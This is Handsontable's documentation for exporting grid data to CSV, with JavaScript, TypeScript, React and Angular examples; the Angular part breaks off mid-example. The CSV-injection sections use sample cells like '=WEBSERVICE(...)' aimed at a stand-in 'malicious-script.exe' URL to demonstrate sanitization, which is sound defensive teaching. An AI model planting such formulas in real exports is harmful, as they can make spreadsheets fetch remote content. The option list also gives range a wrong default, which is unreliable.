Skip to content

Export to CSV

Export your grid’s raw data to the CSV format, as a downloadable file, a blob, or a string. Customize your export using Handsontable’s configuration options.

Examples

Mind that CSV exports contain only raw data, and don’t include formulas, styling, or formatting information.

Export to file

JavaScript
import Handsontable from 'handsontable/base';
import { registerAllModules } from 'handsontable/registry';
// Register all Handsontable's modules.
registerAllModules();
const container = document.querySelector('#example1');
const hot = new Handsontable(container, {
data: [
['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1'],
['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2'],
['A3', 'B3', 'C3', 'D3', 'E3', 'F3', 'G3'],
['A4', 'B4', 'C4', 'D4', 'E4', 'F4', 'G4'],
['A5', 'B5', 'C5', 'D5', 'E5', 'F5', 'G5'],
['A6', 'B6', 'C6', 'D6', 'E6', 'F6', 'G6'],
['A7', 'B7', 'C7', 'D7', 'E7', 'F7', 'G7'],
],
colHeaders: true,
rowHeaders: true,
hiddenRows: { rows: [1, 3, 5], indicators: true },
hiddenColumns: { columns: [1, 3, 5], indicators: true },
height: 'auto',
autoWrapRow: true,
autoWrapCol: true,
licenseKey: 'non-commercial-and-evaluation',
});
const exportPlugin = hot.getPlugin('exportFile');
const button = document.querySelector('#export-file');
button.addEventListener('click', () => {
exportPlugin.downloadFile('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
fileExtension: 'csv',
filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
mimeType: 'text/csv',
rowDelimiter: '\r\n',
rowHeaders: true,
});
});
TypeScript
import Handsontable from 'handsontable/base';
import { registerAllModules } from 'handsontable/registry';
import { ExportFile } from 'handsontable/plugins';
// Register all Handsontable's modules.
registerAllModules();
const container = document.querySelector('#example1')!;
const hot = new Handsontable(container, {
data: [
['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1'],
['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2'],
['A3', 'B3', 'C3', 'D3', 'E3', 'F3', 'G3'],
['A4', 'B4', 'C4', 'D4', 'E4', 'F4', 'G4'],
['A5', 'B5', 'C5', 'D5', 'E5', 'F5', 'G5'],
['A6', 'B6', 'C6', 'D6', 'E6', 'F6', 'G6'],
['A7', 'B7', 'C7', 'D7', 'E7', 'F7', 'G7'],
],
colHeaders: true,
rowHeaders: true,
hiddenRows: { rows: [1, 3, 5], indicators: true },
hiddenColumns: { columns: [1, 3, 5], indicators: true },
height: 'auto',
autoWrapRow: true,
autoWrapCol: true,
licenseKey: 'non-commercial-and-evaluation',
});
const exportPlugin: ExportFile = hot.getPlugin('exportFile');
const button = document.querySelector('#export-file')!;
button.addEventListener('click', () => {
exportPlugin.downloadFile('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
fileExtension: 'csv',
filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
mimeType: 'text/csv',
rowDelimiter: '\r\n',
rowHeaders: true,
});
});
HTML
<div class="example-controls-container">
<div class="controls">
<button id="export-file">Download CSV</button>
</div>
</div>
<div id="example1"></div>

Export as a JavaScript Blob object

Open a console in browser developer tools to see the result for the below example.

JavaScript
import Handsontable from 'handsontable/base';
import { registerAllModules } from 'handsontable/registry';
// Register all Handsontable's modules.
registerAllModules();
const container = document.querySelector('#example2');
const hot = new Handsontable(container, {
data: [
['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1'],
['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2'],
['A3', 'B3', 'C3', 'D3', 'E3', 'F3', 'G3'],
['A4', 'B4', 'C4', 'D4', 'E4', 'F4', 'G4'],
['A5', 'B5', 'C5', 'D5', 'E5', 'F5', 'G5'],
['A6', 'B6', 'C6', 'D6', 'E6', 'F6', 'G6'],
['A7', 'B7', 'C7', 'D7', 'E7', 'F7', 'G7'],
],
colHeaders: true,
rowHeaders: true,
hiddenRows: { rows: [1, 3, 5], indicators: true },
hiddenColumns: { columns: [1, 3, 5], indicators: true },
height: 'auto',
autoWrapRow: true,
autoWrapCol: true,
licenseKey: 'non-commercial-and-evaluation',
});
const exportPlugin = hot.getPlugin('exportFile');
const button = document.querySelector('#export-blob');
button.addEventListener('click', () => {
const exportedBlob = exportPlugin.exportAsBlob('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
mimeType: 'text/csv',
rowDelimiter: '\r\n',
rowHeaders: true,
});
console.log(exportedBlob);
});
TypeScript
import Handsontable from 'handsontable/base';
import { registerAllModules } from 'handsontable/registry';
import { ExportFile } from 'handsontable/plugins';
// Register all Handsontable's modules.
registerAllModules();
const container = document.querySelector('#example2')!;
const hot = new Handsontable(container, {
data: [
['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1'],
['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2'],
['A3', 'B3', 'C3', 'D3', 'E3', 'F3', 'G3'],
['A4', 'B4', 'C4', 'D4', 'E4', 'F4', 'G4'],
['A5', 'B5', 'C5', 'D5', 'E5', 'F5', 'G5'],
['A6', 'B6', 'C6', 'D6', 'E6', 'F6', 'G6'],
['A7', 'B7', 'C7', 'D7', 'E7', 'F7', 'G7'],
],
colHeaders: true,
rowHeaders: true,
hiddenRows: { rows: [1, 3, 5], indicators: true },
hiddenColumns: { columns: [1, 3, 5], indicators: true },
height: 'auto',
autoWrapRow: true,
autoWrapCol: true,
licenseKey: 'non-commercial-and-evaluation',
});
const exportPlugin: ExportFile = hot.getPlugin('exportFile');
const button = document.querySelector('#export-blob')!;
button.addEventListener('click', () => {
const exportedBlob = exportPlugin.exportAsBlob('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
mimeType: 'text/csv',
rowDelimiter: '\r\n',
rowHeaders: true,
});
console.log(exportedBlob);
});
HTML
<div class="example-controls-container">
<div class="controls">
<button id="export-blob">Export as a Blob</button>
</div>
</div>
<div id="example2"></div>

Export as a string

Open a console in browser developer tools to see the result for the below example.

JavaScript
import Handsontable from 'handsontable/base';
import { registerAllModules } from 'handsontable/registry';
// Register all Handsontable's modules.
registerAllModules();
const container = document.querySelector('#example3');
const hot = new Handsontable(container, {
data: [
['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1'],
['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2'],
['A3', 'B3', 'C3', 'D3', 'E3', 'F3', 'G3'],
['A4', 'B4', 'C4', 'D4', 'E4', 'F4', 'G4'],
['A5', 'B5', 'C5', 'D5', 'E5', 'F5', 'G5'],
['A6', 'B6', 'C6', 'D6', 'E6', 'F6', 'G6'],
['A7', 'B7', 'C7', 'D7', 'E7', 'F7', 'G7'],
],
colHeaders: true,
rowHeaders: true,
hiddenRows: { rows: [1, 3, 5], indicators: true },
hiddenColumns: { columns: [1, 3, 5], indicators: true },
height: 'auto',
autoWrapRow: true,
autoWrapCol: true,
licenseKey: 'non-commercial-and-evaluation',
});
const exportPlugin = hot.getPlugin('exportFile');
const button = document.querySelector('#export-string');
button.addEventListener('click', () => {
const exportedString = exportPlugin.exportAsString('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
rowDelimiter: '\r\n',
rowHeaders: true,
});
console.log(exportedString);
});
TypeScript
import Handsontable from 'handsontable/base';
import { registerAllModules } from 'handsontable/registry';
import { ExportFile } from 'handsontable/plugins';
// Register all Handsontable's modules.
registerAllModules();
const container = document.querySelector('#example3')!;
const hot = new Handsontable(container, {
data: [
['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1'],
['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2'],
['A3', 'B3', 'C3', 'D3', 'E3', 'F3', 'G3'],
['A4', 'B4', 'C4', 'D4', 'E4', 'F4', 'G4'],
['A5', 'B5', 'C5', 'D5', 'E5', 'F5', 'G5'],
['A6', 'B6', 'C6', 'D6', 'E6', 'F6', 'G6'],
['A7', 'B7', 'C7', 'D7', 'E7', 'F7', 'G7'],
],
colHeaders: true,
rowHeaders: true,
hiddenRows: { rows: [1, 3, 5], indicators: true },
hiddenColumns: { columns: [1, 3, 5], indicators: true },
height: 'auto',
autoWrapRow: true,
autoWrapCol: true,
licenseKey: 'non-commercial-and-evaluation',
});
const exportPlugin: ExportFile = hot.getPlugin('exportFile');
const button = document.querySelector('#export-string')!;
button.addEventListener('click', () => {
const exportedString = exportPlugin.exportAsString('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
rowDelimiter: '\r\n',
rowHeaders: true,
});
console.log(exportedString);
});
HTML
<div class="example-controls-container">
<div class="controls">
<button id="export-string">Export as a string</button>
</div>
</div>
<div id="example3"></div>

Prevent CSV Injection attack

“CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells starting with = will be interpreted by the software as a formula.” (from OWASP website)

To prevent this attack, set the sanitizeValues option when exporting your data in CSV format.

JavaScript
import Handsontable from 'handsontable/base';
import { registerAllModules } from 'handsontable/registry';
// Register all Handsontable's modules.
registerAllModules();
const container = document.querySelector('#example4');
const hot = new Handsontable(container, {
data: [
['https://handsontable.com', '=WEBSERVICE(A1)'],
['https://github.com', '=WEBSERVICE(A2)'],
['http://example.com/malicious-script.exe', '=WEBSERVICE(A3)'],
],
colHeaders: true,
rowHeaders: true,
height: 'auto',
autoWrapRow: true,
autoWrapCol: true,
licenseKey: 'non-commercial-and-evaluation',
});
const exportPlugin = hot.getPlugin('exportFile');
document.querySelector('#no-sanitization').addEventListener('click', () => {
exportPlugin.downloadFile('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
fileExtension: 'csv',
filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
mimeType: 'text/csv',
rowDelimiter: '\r\n',
});
});
document.querySelector('#recommended-sanitization').addEventListener('click', () => {
exportPlugin.downloadFile('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
fileExtension: 'csv',
filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
mimeType: 'text/csv',
rowDelimiter: '\r\n',
sanitizeValues: true,
});
});
document.querySelector('#regexp-sanitization').addEventListener('click', () => {
exportPlugin.downloadFile('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
fileExtension: 'csv',
filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
mimeType: 'text/csv',
rowDelimiter: '\r\n',
sanitizeValues: /WEBSERVICE/,
});
});
document.querySelector('#function-sanitization').addEventListener('click', () => {
exportPlugin.downloadFile('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
fileExtension: 'csv',
filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
mimeType: 'text/csv',
rowDelimiter: '\r\n',
sanitizeValues: (value) => {
return /WEBSERVICE/.test(value) ? 'REMOVED SUSPICIOUS CELL CONTENT' : value;
},
});
});
TypeScript
import Handsontable from 'handsontable/base';
import { registerAllModules } from 'handsontable/registry';
import { ExportFile } from 'handsontable/plugins';
// Register all Handsontable's modules.
registerAllModules();
const container = document.querySelector('#example4')!;
const hot = new Handsontable(container, {
data: [
['https://handsontable.com', '=WEBSERVICE(A1)'],
['https://github.com', '=WEBSERVICE(A2)'],
['http://example.com/malicious-script.exe', '=WEBSERVICE(A3)'],
],
colHeaders: true,
rowHeaders: true,
height: 'auto',
autoWrapRow: true,
autoWrapCol: true,
licenseKey: 'non-commercial-and-evaluation',
});
const exportPlugin: ExportFile = hot.getPlugin('exportFile');
document.querySelector('#no-sanitization')!.addEventListener('click', () => {
exportPlugin.downloadFile('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
fileExtension: 'csv',
filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
mimeType: 'text/csv',
rowDelimiter: '\r\n',
});
});
document.querySelector('#recommended-sanitization')!.addEventListener('click', () => {
exportPlugin.downloadFile('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
fileExtension: 'csv',
filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
mimeType: 'text/csv',
rowDelimiter: '\r\n',
sanitizeValues: true,
});
});
document.querySelector('#regexp-sanitization')!.addEventListener('click', () => {
exportPlugin.downloadFile('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
fileExtension: 'csv',
filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
mimeType: 'text/csv',
rowDelimiter: '\r\n',
sanitizeValues: /WEBSERVICE/,
});
});
document.querySelector('#function-sanitization')!.addEventListener('click', () => {
exportPlugin.downloadFile('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
fileExtension: 'csv',
filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
mimeType: 'text/csv',
rowDelimiter: '\r\n',
sanitizeValues: (value) => {
return /WEBSERVICE/.test(value) ? 'REMOVED SUSPICIOUS CELL CONTENT' : value;
},
});
});
HTML
<div class="example-controls-container">
<div class="controls">
<button id="no-sanitization">Download CSV with no sanitization</button>
<button id="recommended-sanitization">Download CSV with recommended sanitization</button>
<button id="regexp-sanitization">Download CSV with sanitization using a regexp</button>
<button id="function-sanitization">Download CSV with sanitization using a function</button>
</div>
</div>
<div id="example4"></div>

Available methods

The plugin exposes the following methods to export data.

Each method takes two parameters. The first, format, is required. The second, options, is an optional object that overrides or extends the default export configuration. The table below lists all supported options for CSV export.

Available options in the export configuration

PropertyType / DefaultDescription
bomBoolean, default truePrepend output with BOM (UTF-8). Browser uses EF BB BF.
colHeadersBoolean, default falseInclude column headers. Does not support the NestedHeaders plugin.
columnDelimiterString, default ','Column delimiter.
exportHiddenColumnsBoolean, default falseInclude hidden columns.
exportHiddenRowsBoolean, default falseInclude hidden rows.
fileExtensionString, default 'csv'File extension. Used by downloadFile().
filenameString, default 'Handsontable [YYYY]-[MM]-[DD]'File name. Placeholders [YYYY], [MM], [DD] are replaced with the current date. Used by downloadFile().
mimeTypeString, default 'text/csv'MIME type. Used by downloadFile() and exportAsBlob().
rangeArray, default []Cell range to export: [startRow, startColumn, endRow, endColumn] (visual indexes).
rowDelimiterString, default '\r\n'Row delimiter.
rowHeadersBoolean, default falseInclude row headers.
sanitizeValuesBoolean | RegExp | Function, default falseValue sanitization. true = OWASP CSV injection rules; RegExp = escape matching values; Function = replace with return value.

Plugins

React Data GridExport to CSV

Export your grid's raw data to the CSV format, as a downloadable file, a blob, or a string. Customize your export using Handsontable's configuration options.

Examples

Mind that CSV exports contain only raw data, and don't include formulas, styling, or formatting information.

Export to file

import { useRef } from 'react';
import { HotTable } from '@handsontable/react-wrapper';
import { registerAllModules } from 'handsontable/registry';
import 'handsontable/styles/handsontable.css';
import 'handsontable/styles/ht-theme-main.css';

// register Handsontable's modules
registerAllModules();

const ExampleComponent = () => {
  const hotRef = useRef(null);
  const buttonClickCallback = () => {
    const hot = hotRef.current?.hotInstance;
    const exportPlugin = hot?.getPlugin('exportFile');

    exportPlugin?.downloadFile('csv', {
      bom: false,
      columnDelimiter: ',',
      columnHeaders: false,
      exportHiddenColumns: true,
      exportHiddenRows: true,
      fileExtension: 'csv',
      filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
      mimeType: 'text/csv',
      rowDelimiter: '\r\n',
      rowHeaders: true,
    });
  };

  return (
    <>
      <div className="example-controls-container">
        <div className="controls">
          <button id="export-file" onClick={() => buttonClickCallback()}>
            Download CSV
          </button>
        </div>
      </div>
      <HotTable
        themeName="ht-theme-main"
        ref={hotRef}
        data={[
          ['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1'],
          ['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2'],
          ['A3', 'B3', 'C3', 'D3', 'E3', 'F3', 'G3'],
          ['A4', 'B4', 'C4', 'D4', 'E4', 'F4', 'G4'],
          ['A5', 'B5', 'C5', 'D5', 'E5', 'F5', 'G5'],
          ['A6', 'B6', 'C6', 'D6', 'E6', 'F6', 'G6'],
          ['A7', 'B7', 'C7', 'D7', 'E7', 'F7', 'G7'],
        ]}
        colHeaders={true}
        rowHeaders={true}
        hiddenRows={{ rows: [1, 3, 5], indicators: true }}
        hiddenColumns={{ columns: [1, 3, 5], indicators: true }}
        height="auto"
        autoWrapRow={true}
        autoWrapCol={true}
        licenseKey="non-commercial-and-evaluation"
      />
    </>
  );
};

export default ExampleComponent;

Export as a JavaScript Blob object

Open a console in browser developer tools to see the result for the below example.

import { useRef } from 'react';
import { HotTable } from '@handsontable/react-wrapper';
import { registerAllModules } from 'handsontable/registry';
import 'handsontable/styles/handsontable.css';
import 'handsontable/styles/ht-theme-main.css';

// register Handsontable's modules
registerAllModules();

const ExampleComponent = () => {
  const hotRef = useRef(null);
  const buttonClickCallback = () => {
    const hot = hotRef.current?.hotInstance;
    const exportPlugin = hot?.getPlugin('exportFile');
    const exportedBlob = exportPlugin?.exportAsBlob('csv', {
      bom: false,
      columnDelimiter: ',',
      columnHeaders: false,
      exportHiddenColumns: true,
      exportHiddenRows: true,
      mimeType: 'text/csv',
      rowDelimiter: '\r\n',
      rowHeaders: true,
    });

    console.log(exportedBlob);
  };

  return (
    <>
      <div className="controls">
        <button id="export-blob" onClick={() => buttonClickCallback()}>
          Export as a Blob
        </button>
      </div>
      <HotTable
        themeName="ht-theme-main"
        ref={hotRef}
        data={[
          ['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1'],
          ['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2'],
          ['A3', 'B3', 'C3', 'D3', 'E3', 'F3', 'G3'],
          ['A4', 'B4', 'C4', 'D4', 'E4', 'F4', 'G4'],
          ['A5', 'B5', 'C5', 'D5', 'E5', 'F5', 'G5'],
          ['A6', 'B6', 'C6', 'D6', 'E6', 'F6', 'G6'],
          ['A7', 'B7', 'C7', 'D7', 'E7', 'F7', 'G7'],
        ]}
        colHeaders={true}
        rowHeaders={true}
        hiddenRows={{ rows: [1, 3, 5], indicators: true }}
        hiddenColumns={{ columns: [1, 3, 5], indicators: true }}
        height="auto"
        autoWrapRow={true}
        autoWrapCol={true}
        licenseKey="non-commercial-and-evaluation"
      />
    </>
  );
};

export default ExampleComponent;

Export as a string

Open a console in browser developer tools to see the result for the below example.

import { useRef } from 'react';
import { HotTable } from '@handsontable/react-wrapper';
import { registerAllModules } from 'handsontable/registry';
import 'handsontable/styles/handsontable.css';
import 'handsontable/styles/ht-theme-main.css';

// register Handsontable's modules
registerAllModules();

const ExampleComponent = () => {
  const hotRef = useRef(null);
  const buttonClickCallback = () => {
    const hot = hotRef.current?.hotInstance;
    const exportPlugin = hot?.getPlugin('exportFile');
    const exportedString = exportPlugin?.exportAsString('csv', {
      bom: false,
      columnDelimiter: ',',
      columnHeaders: false,
      exportHiddenColumns: true,
      exportHiddenRows: true,
      rowDelimiter: '\r\n',
      rowHeaders: true,
    });

    console.log(exportedString);
  };

  return (
    <>
      <div className="controls">
        <button id="export-string" onClick={() => buttonClickCallback()}>
          Export as a string
        </button>
      </div>
      <HotTable
        themeName="ht-theme-main"
        ref={hotRef}
        data={[
          ['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1'],
          ['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2'],
          ['A3', 'B3', 'C3', 'D3', 'E3', 'F3', 'G3'],
          ['A4', 'B4', 'C4', 'D4', 'E4', 'F4', 'G4'],
          ['A5', 'B5', 'C5', 'D5', 'E5', 'F5', 'G5'],
          ['A6', 'B6', 'C6', 'D6', 'E6', 'F6', 'G6'],
          ['A7', 'B7', 'C7', 'D7', 'E7', 'F7', 'G7'],
        ]}
        colHeaders={true}
        rowHeaders={true}
        hiddenRows={{ rows: [1, 3, 5], indicators: true }}
        hiddenColumns={{ columns: [1, 3, 5], indicators: true }}
        height="auto"
        autoWrapRow={true}
        autoWrapCol={true}
        licenseKey="non-commercial-and-evaluation"
      />
    </>
  );
};

export default ExampleComponent;

Prevent CSV Injection attack

"CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells starting with = will be interpreted by the software as a formula." (from OWASP website (opens new window))

To prevent this attack, set the sanitizeValues option when exporting your data in CSV format.

import { useRef } from 'react';
import { HotTable } from '@handsontable/react-wrapper';
import { registerAllModules } from 'handsontable/registry';
import 'handsontable/styles/handsontable.css';
import 'handsontable/styles/ht-theme-main.css';

// register Handsontable's modules
registerAllModules();

const ExampleComponent = () => {
  const hotRef = useRef(null);
  const downloadWithNoSanitizationCallback = () => {
    const hot = hotRef.current?.hotInstance;
    const exportPlugin = hot?.getPlugin('exportFile');

    exportPlugin?.downloadFile('csv', {
      bom: false,
      columnDelimiter: ',',
      columnHeaders: false,
      exportHiddenColumns: true,
      exportHiddenRows: true,
      fileExtension: 'csv',
      filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
      mimeType: 'text/csv',
      rowDelimiter: '\r\n',
    });
  };

  const downloadWithRecommendedSanitizationCallback = () => {
    const hot = hotRef.current?.hotInstance;
    const exportPlugin = hot?.getPlugin('exportFile');

    exportPlugin?.downloadFile('csv', {
      bom: false,
      columnDelimiter: ',',
      columnHeaders: false,
      exportHiddenColumns: true,
      exportHiddenRows: true,
      fileExtension: 'csv',
      filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
      mimeType: 'text/csv',
      rowDelimiter: '\r\n',
      sanitizeValues: true,
    });
  };

  const downloadWithRegexpSanitizationCallback = () => {
    const hot = hotRef.current?.hotInstance;
    const exportPlugin = hot?.getPlugin('exportFile');

    exportPlugin?.downloadFile('csv', {
      bom: false,
      columnDelimiter: ',',
      columnHeaders: false,
      exportHiddenColumns: true,
      exportHiddenRows: true,
      fileExtension: 'csv',
      filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
      mimeType: 'text/csv',
      rowDelimiter: '\r\n',
      sanitizeValues: /WEBSERVICE/,
    });
  };

  const downloadWithFunctionSanitizationCallback = () => {
    const hot = hotRef.current?.hotInstance;
    const exportPlugin = hot?.getPlugin('exportFile');

    exportPlugin?.downloadFile('csv', {
      bom: false,
      columnDelimiter: ',',
      columnHeaders: false,
      exportHiddenColumns: true,
      exportHiddenRows: true,
      fileExtension: 'csv',
      filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
      mimeType: 'text/csv',
      rowDelimiter: '\r\n',
      sanitizeValues: (value) => {
        return /WEBSERVICE/.test(value) ? 'REMOVED SUSPICIOUS CELL CONTENT' : value;
      },
    });
  };

  return (
    <>
      <div className="example-controls-container">
        <div className="controls">
          <button onClick={() => downloadWithNoSanitizationCallback()}>Download CSV with no sanitization</button>
          <button onClick={() => downloadWithRecommendedSanitizationCallback()}>
            Download CSV with recommended sanitization
          </button>
          <button onClick={() => downloadWithRegexpSanitizationCallback()}>
            Download CSV with sanitization using a regexp
          </button>
          <button onClick={() => downloadWithFunctionSanitizationCallback()}>
            Download CSV with sanitization using a function
          </button>
        </div>
      </div>
      <HotTable
        themeName="ht-theme-main"
        ref={hotRef}
        data={[
          ['https://handsontable.com', '=WEBSERVICE(A1)'],
          ['https://github.com', '=WEBSERVICE(A2)'],
          ['http://example.com/malicious-script.exe', '=WEBSERVICE(A3)'],
        ]}
        colHeaders={true}
        rowHeaders={true}
        height="auto"
        autoWrapRow={true}
        autoWrapCol={true}
        licenseKey="non-commercial-and-evaluation"
      />
    </>
  );
};

export default ExampleComponent;

Available methods

TIP

To use the Handsontable API, you'll need access to the Handsontable instance. You can do that by utilizing a reference to the HotTable component, and reading its hotInstance property.

For more information, see the Instance methods page.

The plugin exposes the following methods to export data.

All of them accept the same arguments:

format String

This is required to prepare a predefined settings object. We currently allow for only 'csv' to be used.

options Object

This is an optional argument. It contains a set of supported options and extends the predefined CSV configuration. For the complete list of options that you can use, see available options.

Available options in the export configuration

Below you can find all supported options:

bom Boolean

Allows you to export data with a BOM signature.

Note that this property will prepend content with the UTF-16BE BOM signature (FE FF). The browser will convert the signature to the UTF-8 value (EF BB BF) automatically.

You can use this property in all of the available methods.

Default value: true

columnDelimiter String

Allows you to define the columns delimiter.

You can use this property in all of the available methods.

Default value: ','

columnHeaders Boolean

When set to true, includes column headers in the exported data.

You can use this property in all of the available methods.

The columnHeaders option doesn't support the NestedHeaders plugin.

Default value: false

exportHiddenColumns Boolean

Allows you to export data from hidden columns.

You can use this property in all of the available methods.

Default value: false

exportHiddenRows Boolean

Allows you to export data from hidden rows.

You can use this property in all of the available methods.

Default value: false

fileExtension String

Allows you to define the file extension.

You can use this property in the downloadFile() method.

Default value: 'csv'

filename String

Allows you to define the file name.

You can use predefined placeholders, which will be replaced by the date.

You can use this property in the downloadFile() method.

Default value: 'Handsontable [YYYY]-[MM]-[DD]'

mimeType String

Allows you to define the MIME type.

You can use this property in the downloadFile() and exportAsBlob() methods.

Default value: 'text/csv'

sanitizeValues Boolean|RegExp|Function

Controls the value sanitization during the CSV export

  • when sanitizeValues is false, ExportPlugin doesn't sanitize the values
  • when sanitizeValues is true, ExportPlugin sanitizes values according to OWASP recommendations (opens new window).
  • when sanitizeValues is a regexp, ExportPlugin escapes values that match the regexp
  • when sanitizeValues is a function, ExportPlugin replaces values with the return value of the function

Default value: false

range Array

Allows you to define a range of dataset to export. It's represented by an array of numeric, visual indexes [startRow, startColumn, endRow, endColumn].

You can use this property in all of the available methods.

Default value: 'text/csv'

rowDelimiter String

Allows you to define rows delimiter.

You can use this property in all of the available methods.

Default value: '\r\n'

rowHeaders Boolean

Allows you to export data with their row header.

You can use this property in all of the available methods.

Default value: false

Skip to content

Export to CSV

Export your grid’s raw data to the CSV format, as a downloadable file, a blob, or a string. Customize your export using Handsontable’s configuration options.

Examples

Mind that CSV exports contain only raw data, and don’t include formulas, styling, or formatting information.

Export to file

TypeScript
/* file: app.component.ts */
import { Component, ViewChild } from '@angular/core';
import { GridSettings, HotTableComponent, HotTableModule} from '@handsontable/angular-wrapper';
@Component({
standalone: true,
imports: [HotTableModule],
selector: 'app-example1',
template: `
<div class="example-controls-container">
<div class="controls">
<button (click)="exportFile()">Download CSV</button>
</div>
</div>
<hot-table
[settings]="hotSettings!" [data]="hotData">
</hot-table>
`,
})
export class AppComponent {
@ViewChild(HotTableComponent, {static: false}) hotTable!: HotTableComponent;
readonly hotData = [
['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1'],
['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2'],
['A3', 'B3', 'C3', 'D3', 'E3', 'F3', 'G3'],
['A4', 'B4', 'C4', 'D4', 'E4', 'F4', 'G4'],
['A5', 'B5', 'C5', 'D5', 'E5', 'F5', 'G5'],
['A6', 'B6', 'C6', 'D6', 'E6', 'F6', 'G6'],
['A7', 'B7', 'C7', 'D7', 'E7', 'F7', 'G7'],
];
readonly hotSettings: GridSettings = {
colHeaders: true,
rowHeaders: true,
hiddenRows: { rows: [1, 3, 5], indicators: true },
hiddenColumns: { columns: [1, 3, 5], indicators: true },
height: 'auto',
autoWrapRow: true,
autoWrapCol: true,
};
exportFile() {
const exportPlugin = this.hotTable.hotInstance!.getPlugin('exportFile');
exportPlugin.downloadFile('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
fileExtension: 'csv',
filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
mimeType: 'text/csv',
rowDelimiter: '\r\n',
rowHeaders: true,
});
}
}
/* end-file */
/* file: app.config.ts */
import { ApplicationConfig, provideZoneChangeDetection } from '@angular/core';
import { registerAllModules } from 'handsontable/registry';
import { HOT_GLOBAL_CONFIG, HotGlobalConfig, NON_COMMERCIAL_LICENSE } from '@handsontable/angular-wrapper';
// register Handsontable's modules
registerAllModules();
export const appConfig: ApplicationConfig = {
providers: [
provideZoneChangeDetection({ eventCoalescing: true }),
{
provide: HOT_GLOBAL_CONFIG,
useValue: { license: NON_COMMERCIAL_LICENSE } as HotGlobalConfig,
},
],
};
/* end-file */
HTML
<div>
<app-example1></app-example1>
</div>

Export as a JavaScript Blob object

Open a console in browser developer tools to see the result for the below example.

TypeScript
/* file: app.component.ts */
import { Component, ViewChild } from '@angular/core';
import { GridSettings, HotTableComponent, HotTableModule} from '@handsontable/angular-wrapper';
@Component({
standalone: true,
imports: [HotTableModule],
selector: 'app-example2',
template: `
<div class="example-controls-container">
<div class="controls">
<button (click)="exportBlob()">Export as a Blob</button>
</div>
</div>
<hot-table
[settings]="hotSettings!" [data]="hotData">
</hot-table>
`,
})
export class AppComponent {
@ViewChild(HotTableComponent, {static: false}) hotTable!: HotTableComponent;
readonly hotData = [
['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1'],
['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2'],
['A3', 'B3', 'C3', 'D3', 'E3', 'F3', 'G3'],
['A4', 'B4', 'C4', 'D4', 'E4', 'F4', 'G4'],
['A5', 'B5', 'C5', 'D5', 'E5', 'F5', 'G5'],
['A6', 'B6', 'C6', 'D6', 'E6', 'F6', 'G6'],
